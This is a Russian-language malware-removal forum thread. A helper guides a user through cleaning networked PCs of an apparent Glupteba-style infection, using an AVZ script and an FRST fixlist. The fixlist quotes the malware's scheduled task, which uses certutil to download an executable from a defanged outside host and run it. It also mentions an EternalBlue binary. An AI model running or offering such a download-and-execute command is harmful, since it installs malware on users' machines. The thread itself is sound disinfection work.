Исчезают exe файлы разных программ на разных пк в сети ПК2

[Алексей_Азов]

Добрый день. На этом ПК исчезает исполняемый файл для просмотра pdf.

[Info_bot]

Уважаемый(ая) Алексей_Азов, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[thyrex]

Выполните скрипт в AVZ из папки Autologger

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\fefelova\AppData\Local\Temp\csrss\scheduled.exe','');
 SetServiceStart('Winmon', 4);
 SetServiceStart('WinmonFS', 4);
 SetServiceStart('WinmonProcessMonitor', 4);
 DeleteService('WinmonProcessMonitor');
 DeleteService('WinmonFS');
 DeleteService('Winmon');
 SetServiceStart('WinDefender', 4);
 DeleteService('WinDefender');
 QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','');
 QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys','');
 QuarantineFile('C:\Windows\System32\drivers\Winmon.sys','');
 TerminateProcessByName('c:\users\fefelova\appdata\local\temp\wup\wup.exe');
 QuarantineFile('c:\users\fefelova\appdata\local\temp\wup\wup.exe','');
 TerminateProcessByName('c:\windows\windefender.exe');
 QuarantineFile('c:\windows\windefender.exe','');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 QuarantineFile('c:\windows\rss\csrss.exe','');
 DeleteFile('c:\windows\rss\csrss.exe','32');
 DeleteFile('c:\windows\windefender.exe','32');
 DeleteFile('c:\users\fefelova\appdata\local\temp\wup\wup.exe','32');
 DeleteFile('C:\Windows\System32\drivers\Winmon.sys','32');
 DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys','32');
 DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys','32');
 DeleteFile('C:\Windows\system32\Tasks\MRT','32');
 DeleteFile('C:\Windows\system32\Tasks\ScheduledUpdate','32');
 DeleteFile('C:\Users\fefelova\AppData\Local\Temp\csrss\scheduled.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

• Обратите внимание: будет выполнена перезагрузка компьютера.

Выполните скрипт в AVZ

Код:

begin
CreateQurantineArchive('c:\quarantine.zip');
end.

c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger, прикрепите к следующему сообщению НОВЫЕ логи.

[Алексей_Азов]

Новые логи прикрепил, карантин не могу прикрепить пишет файл уже загружен...приложил к ответу...

[thyrex]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

[Алексей_Азов]

готово...

[thyrex]

Обновления для системы, MS SQL все установлены на проблемных машинах? Очень сомнительно. Это обновление https://www.catalog.update.microsoft...px?q=KB4012212 точно не установлено, если судить по запущенному процессу

C:\Users\fefelova\AppData\Local\Temp\csrss\smb\POu HkNVIcQKncGCriKmqwgDOcZnR\Eternalblue-2.2.0.exe

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

Код:

CreateRestorePoint:
File: C:\Users\fefelova\AppData\Local\Temp\csrss\smb\POuHkNVIcQKncGCriKmqwgDOcZnR\Eternalblue-2.2.0.exe
HKU\S-1-5-21-3817106852-2310427095-3223218271-1000\...\Run: [HiddenWaterfall] => C:\Windows\rss\csrss.exe [3111936 2018-08-07] () <==== ATTENTION
CHR Extension: (Gmail) - C:\Users\fefelova\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-31]
CHR HKLM\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [cpegcopcfajiiibidlaelhjjblpefbjk] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [geidjeefddhgefeplhdlegoldlgiodon] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [iifchhfnnmpdbibifmljnfjhpififfog] - hxxps://clients2.google.com/service/update2/crx
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [28368 2018-08-07] () [File not signed] <==== ATTENTION
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\windefender.exe
C:\Windows\System32\drivers\Winmon.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\rss
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{030bba70-2f66-4946-8236-970113398ba3}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_FD94_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{07094190-84d8-4baa-a3a7-2aefea5258d0}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_793C_10.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{07ec8b2c-ebed-4155-8669-fd1601eac0f5}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_FD94_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{07f8f63b-17b3-4dbc-95bd-0fcb459db502}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_FD94_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{0a598a1f-11e8-40ad-8f4b-274032ee2a93}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_DCF1_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{17f5997e-ee53-44ab-8ac2-2159c1903ed1}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_DCF1_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{20c47ffc-019d-40e3-a02e-ab18575562a8}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_FD94_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{2d0b4c81-4b7b-4f24-b900-a8fa891048bb}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_60D9_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{31f0d30a-b87e-4c09-8eb8-6d3dcf3ff677}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_60D9_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{32e34c63-2013-4ee9-b4fb-3bf4aa33aa25}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_6DC7_1b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{38b45e1d-d9e4-40c0-bc24-d483b002c3a9}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_D365_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{3bb7a86b-df40-4a53-b003-2ec58cc751df}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_FD94_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{43ddb8b2-8cf7-4d13-af6f-d42b19b8da53}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_2C26_11.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{4731b7ef-4c59-4151-af2b-ab213ac6ad6b}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_DCF1_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{49effcfe-e5bc-44ca-a7d8-e02c8ded5b12}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_793C_10.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{50e5e585-72f0-411d-a6e2-311c88a844e1}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_60D9_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{5586dee5-412f-4444-890a-75094e250b2f}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_C35D_12.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{5896c818-f87a-444f-a5a0-155a09cc8dee}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_793C_10.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{5c67f9e8-f68e-42f7-9d9b-f1ccda0758a4}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_C35D_12.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{60940425-4085-4f11-ab34-b9dacd636f4b}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_610D_8b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{61a955b5-06dc-4371-bae4-c228777d6d87}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_6DC7_1b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{621baff0-003f-4f39-84c1-665aeb0b6f31}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_C35D_12.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{680849bc-b86d-4669-9219-ad9ac13e4ddc}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_610D_8b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{6a8f8752-e2ec-485d-8e46-b2509f668d26}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_E80F_52.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{6da75278-e916-4a18-934f-1d90b2cebabd}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_E80F_52.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{7b7c1f93-8199-4da7-88eb-e25a222c7a15}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_610D_8b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{84c4ebb7-2931-46c1-9150-325bb5d88bd7}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_793C_10.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{85704148-a6c0-4a36-bb16-601a32bc345a}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_D365_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{8867b89d-cf00-4120-ab72-2ae68678ee63}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_2C26_11.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{930e573d-7b3f-4325-b6f4-afc57d96f241}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_D365_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{94f2b2bc-6bf1-40b9-a1e4-73b23c8ecd1e}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_DCF1_14.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{9ee0a337-0726-4400-95e8-77e893ec681c}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_E80F_52.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{a70b6806-f2e5-44a5-abb2-14a63cedf752}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_E80F_52.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{a95debcb-79ff-4f86-a826-149e46013e3b}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_60D9_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{acad8a98-286a-420b-9fa3-02c0593917c9}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_610D_8b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{b524799f-1122-4978-ad75-514c406b08b5}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_6DC7_1b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{b5be1905-50dc-43d6-a428-3ce5ea7a6b5f}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_C35D_12.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{ba622d4c-73b4-4328-abab-53712e0710d7}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_60D9_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{bf3c66ee-7d7c-43ec-a361-613096d098a0}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_2C26_11.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{c06ac6b9-2168-46eb-b8af-06e04c3285c0}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_793C_10.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{c0d9e8de-0c5f-45a4-9412-095993179c52}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_D365_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{c127373e-5025-4630-a5be-23c4d86ac559}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_610D_8b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{c67f5a68-7773-45de-9ca5-2c8a0cbb9d42}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_2C26_11.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{cfe33012-70f5-428e-bedc-b26bf237e21c}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_6DC7_1b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{da03a3b3-e1b9-4b4f-8607-cf0c1409f55b}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_C35D_12.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{e7727e52-306a-4026-a1f3-0a67008f443d}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_E80F_52.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{ea31ff63-b2b7-468b-b83a-585632d1f4d4}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_D365_f.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{f421a744-f2b7-4f8b-a540-2b5ecb8c10b4}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_2C26_11.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{fb668c1b-efe4-457c-9923-e0144150e9e1}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_6DC7_1b.tmp => No File
CustomCLSID: HKU\S-1-5-21-3817106852-2310427095-3223218271-1000_Classes\CLSID\{fd8bec61-dc98-4d29-8194-022271386a90}\InprocServer32 -> C:\Users\fefelova\AppData\Local\Temp\v8_DCF1_14.tmp => No File
Task: {3149EF0D-9323-4959-B672-9AFAB4E5DB4B} - System32\Tasks\MRT => C:\Users\fefelova\AppData\Local\Temp\csrss\mrt.exe <==== ATTENTION
Task: {941D5A48-6205-4E5F-BA95-9D922A2E91FE} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-08-07] () <==== ATTENTION
Task: {A5341EC5-FBB5-42AE-B3B1-DEA59439D4B3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\fefelova\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\fefelova\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
C:\Users\fefelova\AppData\Local\Temp\csrss\smb\POuHkNVIcQKncGCriKmqwgDOcZnR\Eternalblue-2.2.0.exe
C:\Users\fefelova\AppData\Local\Temp\csrss
AlternateDataStreams: C:\codename010316.zip:com.apple.metadatakMDItemDownloadedDate [26]
AlternateDataStreams: C:\codename010316.zip:com.apple.metadatakMDItemWhereFroms [280]
AlternateDataStreams: C:\codename010316.zip:com.apple.quarantine [57]
AlternateDataStreams: C:\GTDDOS157482-1.LIC:com.apple.metadatacom_apple_mail_dateReceived [102]
AlternateDataStreams: C:\GTDDOS157482-1.LIC:com.apple.metadatacom_apple_mail_dateSent [102]
AlternateDataStreams: C:\GTDDOS157482-1.LIC:com.apple.metadatakMDItemWhereFroms [638]
AlternateDataStreams: C:\GTDDOS157482-1.LIC:com.apple.metadatakMDLabel_maugg5frexhcmol4letn5nstlu [628]
AlternateDataStreams: C:\GTDDOS157482-1.LIC:com.apple.quarantine [55]
AlternateDataStreams: C:\zapwin260416.zip:com.apple.metadatakMDItemDownloadedDate [26]
AlternateDataStreams: C:\zapwin260416.zip:com.apple.metadatakMDItemWhereFroms [290]
AlternateDataStreams: C:\zapwin260416.zip:com.apple.quarantine [57]
FirewallRules: [{946F887A-4DCE-4DA3-8940-71BCBA07894E}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{1244D6F6-AE71-40DE-A53F-6B9B53FF2DEA}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{DEC56E60-0BB8-4DFC-962A-650843709F12}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{E2FEB77D-026E-4872-AFCF-AD1B6C443806}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{310F0FDB-8E2B-4C2D-BDBC-271CCEE2A0DA}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{03BF8367-DACF-4139-8D27-EF99AE9586B5}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{CAA02627-106D-4AD4-95C5-E35A18D6E991}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{6F6A71CD-B8F9-4403-B6B5-4E2D617EC19F}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{C3CB10E6-73C8-40E4-AA56-BE81669DDF78}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{4E2AAD52-ACD4-42F9-AE8F-734FF4600CCE}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{2D8FFB55-C3CF-4376-9C94-584048FE0DB2}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{1E6C4862-0547-47A2-A6E2-2A16227E5691}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{1B63A3FB-5772-42B1-A554-CBFCD88ECDC0}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{3718A28E-3A77-4089-BF2D-36B5D307D0DE}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{56CD7873-9CED-488C-B610-49DFD2FE7316}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{463BB293-C407-4DB6-82AE-6CD9E9CF822D}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{42039658-9B63-4E78-9D87-EE02EA6CB524}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{0DC87758-7ABE-4ED0-BF73-8F844F0B4A4D}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{E69C2D05-F8E1-4C08-9DC3-DA5907637640}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{88C30672-7756-4EA0-AC08-94E01E1EC66E}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{5A1FBE75-666C-422F-9D1E-40190367EDDD}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{3FAB0118-D645-4A2C-822A-3303F432EB29}] => (Allow) C:\Users\fefelova\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
C:\Users\fefelova\AppData\Roaming\EpicNet Inc
Reboot:

2. Нажмите Файл – Сохранить как
3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool
4. Укажите Тип файла – Все файлы (*.*)
5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить
6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.